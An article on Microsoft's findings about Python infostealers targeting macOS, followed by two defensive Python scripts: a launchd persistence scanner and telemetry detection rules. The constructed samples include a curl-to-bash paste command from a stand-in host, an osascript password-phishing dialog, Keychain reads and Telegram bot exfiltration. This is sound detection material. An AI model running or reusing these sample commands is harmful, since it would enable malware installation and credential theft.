Microsoft has highlighted a significant increase in information-stealing malware targeting macOS. The stealers are written in cross-platform languages such as Python, which lets tooling that originally targeted Windows be ported with little effort. These campaigns rely on social engineering and malicious advertisements to trick users into installing malware that harvests sensitive data, including browser credentials and cryptocurrency wallet information.
Microsoft security researchers have identified a growing trend of cybercriminals moving beyond their traditional focus on Windows to target macOS users with data-theft tools. Because the code is written in a cross-platform language like Python, attackers can adapt it to a different operating system with minimal changes. The campaigns lean on social engineering: ClickFix-style lures, where a fake verification or error page instructs the victim to paste a command into Terminal, and malicious installers that pose as legitimate software or system updates.
Once a system is infected, these stealers use native macOS utilities and automation scripts (AppleScript and shell, for example) rather than dropping custom binaries, which helps them evade security controls and keeps their footprint small. The malware targets a wide range of sensitive information, including iCloud Keychain data, browser session cookies, and developer credentials. Attackers have also been observed using messaging platforms such as Telegram and WhatsApp to run their operations and to exfiltrate stolen data to private servers.
A common entry point is malvertising: fraudulent ads for popular tools or artificial intelligence software placed in search engine results. A user who clicks such an ad is redirected to a look-alike website that prompts them to download a disk image (DMG) containing a malware family such as Atomic macOS Stealer (AMOS). Other campaigns use fake PDF editors or productivity tools to gain a foothold, showing the variety of disguises these threats adopt to avoid suspicion.
The impact of these attacks is broad, as seen in campaigns such as PXA Stealer, which harvests financial details and browser data for fraud. To survive a reboot, the malware registers itself to be relaunched at login or on a schedule; on macOS this means a LaunchAgent or LaunchDaemon (or a cron entry) rather than the scheduled tasks and registry keys used on Windows, which do not exist on macOS. This persistent access lets attackers reuse stolen credentials to move laterally into corporate networks, potentially leading to larger data breaches or ransomware deployment.
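A practical check for the persistence described above is to scan the LaunchAgent and LaunchDaemon plists on a Mac for entries that start an interpreter on a script in a user-writable or hidden location. The following is an added example written for this page, not code from Microsoft's report or from any of the malware families named; the two plists it scans are constructed samples, and the heuristics (interpreter as the program, payload under /tmp or /Users/Shared or a dot-directory, an Apple-style label in a per-user LaunchAgents folder) are the author's assumptions about what stealer persistence typically looks like.

```python
import os
import plistlib
import re

# Constructed sample: a plausible vendor LaunchAgent that should NOT be flagged.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/updater</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
"""

# Constructed sample modelled on interpreter-based stealer persistence (not a real capture).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/python3</string>
    <string>/Users/Shared/.cache/update.py</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""

INTERPRETERS = {"python", "python3", "osascript", "bash", "sh", "zsh", "curl"}
# Locations a non-root user can write to, where a legitimate vendor rarely keeps a daemon.
USER_WRITABLE = re.compile(
    r"^(/tmp|/var/tmp|/private/tmp|/Users/Shared|/Users/[^/]+/(Library|\.[^/]+))(/|$)")


def program_args(plist):
    """Return the launch command as a list, handling both Program and ProgramArguments."""
    args = plist.get("ProgramArguments")
    if not args:
        prog = plist.get("Program")
        args = [prog] if prog else []
    return [str(a) for a in args]


def scan_launch_agent(plist_bytes, plist_path):
    """Return the list of reasons this launchd plist looks like stealer persistence (empty if clean)."""
    plist = plistlib.loads(plist_bytes)
    reasons = []
    args = program_args(plist)
    if not args:
        return reasons
    exe = args[0].rsplit("/", 1)[-1]
    if exe in INTERPRETERS:
        reasons.append(f"interpreter launched directly: {args[0]}")
    for arg in args[1:]:
        if arg in ("-c", "-e"):
            reasons.append("inline script passed on the command line")
        elif USER_WRITABLE.match(arg) or any(p.startswith(".") for p in arg.split("/")[1:]):
            reasons.append(f"payload in user-writable or hidden location: {arg}")
    label = str(plist.get("Label", ""))
    if label.startswith("com.apple.") and "/Users/" in plist_path:
        reasons.append(f"Apple-style label in a per-user LaunchAgents directory: {label}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive") and reasons:
        reasons.append("RunAtLoad + KeepAlive keeps the payload running after reboot")
    return reasons


def scan_directories(dirs):
    """Scan every .plist in the given launchd directories; returns {path: reasons} for hits only."""
    findings = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            path = os.path.join(d, name)
            if not name.endswith(".plist"):
                continue
            try:
                with open(path, "rb") as fh:
                    reasons = scan_launch_agent(fh.read(), path)
            except (OSError, plistlib.InvalidFileException):
                continue
            if reasons:
                findings[path] = reasons
    return findings


if __name__ == "__main__":
    home = os.path.expanduser("~")
    targets = [os.path.join(home, "Library/LaunchAgents"),
               "/Library/LaunchAgents", "/Library/LaunchDaemons"]
    for path, reasons in scan_directories(targets).items():
        print(path)
        for r in reasons:
            print("   -", r)
```

Run it as the logged-in user to cover ~/Library/LaunchAgents, and again with sudo for the system directories. A hit is a lead, not a verdict: confirm by inspecting the script the plist points at and the process tree it spawns.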
To defend against these threats, security experts recommend that organizations educate users about the risks of unverified downloads and fake browser prompts, especially pages that ask them to paste commands into Terminal. Monitoring for unusual Terminal and scripting activity, and for processes other than the expected applications reading the login Keychain or browser credential stores, is also essential. Inspecting network traffic for exfiltration to messaging-platform APIs and staying alert to search engine poisoning further reduces the chance that personal and corporate data is compromised.
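The monitoring advice above can be turned into detection logic over endpoint telemetry. The following is an added example for this page, not code from the report or from any vendor product: it runs four rules over constructed JSON event lines shaped like what an EDR or the Endpoint Security framework emits (a paste-and-run shell pipeline launched from Terminal, an osascript password prompt with a hidden answer, a non-browser process opening the login Keychain or a browser credential database, and a scripting process posting to the Telegram Bot API). The event schema, the trusted-reader list and the sample lines are the author's assumptions; the Telegram Bot API URL shape is the public one, and the osascript "hidden answer" prompt is a well-known stealer credential-phishing technique rather than something stated in the article.

```python
import json
import re

# Constructed telemetry lines (not real captures). One JSON object per line.
EVENTS = [
    '{"ts":"2025-01-01T10:00:01Z","type":"exec","process":"bash","parent":"Terminal",'
    '"cmdline":"bash -c \\"curl -fsSL https://example.invalid/fix.sh | bash\\""}',
    '{"ts":"2025-01-01T10:00:04Z","type":"exec","process":"osascript","parent":"python3",'
    '"cmdline":"osascript -e \'display dialog \\"macOS needs to update settings\\" '
    'default answer \\"\\" with hidden answer\'"}',
    '{"ts":"2025-01-01T10:00:06Z","type":"file_open","process":"python3",'
    '"path":"/Users/alice/Library/Keychains/login.keychain-db"}',
    '{"ts":"2025-01-01T10:00:07Z","type":"file_open","process":"Google Chrome",'
    '"path":"/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"}',
    '{"ts":"2025-01-01T10:00:09Z","type":"network","process":"python3",'
    '"url":"https://api.telegram.org/bot123456789:AAxyz_abc-123/sendDocument"}',
    '{"ts":"2025-01-01T10:01:00Z","type":"exec","process":"git","parent":"Terminal",'
    '"cmdline":"git pull"}',
]

# Rule 1: ClickFix-style "paste this into Terminal": a download or base64 blob piped into a shell.
SHELL_PIPE = re.compile(
    r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b|base64\s+(-d|--decode).*\|\s*(ba|z)?sh\b")
# Rule 2: AppleScript dialog that collects a password (hidden answer) to unlock the Keychain.
PASSWORD_PROMPT = re.compile(r"display dialog.*hidden answer", re.I)
# Rule 3: credential stores that only the owning app or securityd should normally open.
CRED_STORE = re.compile(
    r"(/Library/Keychains/login\.keychain-db"
    r"|/Application Support/Google/Chrome/[^/]+/(Login Data|Cookies)"
    r"|/Firefox/Profiles/[^/]+/(logins\.json|cookies\.sqlite))$")
TRUSTED_CRED_READERS = {"securityd", "Safari", "Google Chrome", "firefox", "Keychain Access"}
# Rule 4: exfiltration through a Telegram bot from a scripting tool rather than the Telegram app.
TELEGRAM_BOT = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/send(Document|Message)")
SCRIPTING_TOOLS = {"python3", "python", "curl", "osascript", "bash", "sh", "zsh"}


def classify(event):
    """Return the list of rule names a single event triggers."""
    hits = []
    kind = event.get("type")
    if kind == "exec":
        cmd = event.get("cmdline", "")
        if event.get("parent") == "Terminal" and SHELL_PIPE.search(cmd):
            hits.append("clickfix_paste_and_run")
        if "osascript" in cmd and PASSWORD_PROMPT.search(cmd):
            hits.append("fake_password_prompt")
    elif kind == "file_open":
        if CRED_STORE.search(event.get("path", "")) and event.get("process") not in TRUSTED_CRED_READERS:
            hits.append("credential_store_read")
    elif kind == "network":
        if TELEGRAM_BOT.search(event.get("url", "")) and event.get("process") in SCRIPTING_TOOLS:
            hits.append("telegram_bot_exfil")
    return hits


def detect(lines):
    """Run every rule over JSON event lines; returns (timestamp, process, rule) tuples in order."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry is skipped, not fatal
        for rule in classify(ev):
            alerts.append((ev.get("ts"), ev.get("process"), rule))
    return alerts


if __name__ == "__main__":
    for ts, proc, rule in detect(EVENTS):
        print(f"{ts} {proc:<14} {rule}")
```

The rules are deliberately narrow so they can be tuned against real baselines: a developer who legitimately runs curl | sh from Terminal will trip rule 1, so in production the rule should be joined with the others in a short time window rather than alerting on its own.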
Source: Microsoft Warns Python Infostealers Target macOS Via Fake Ads And Installers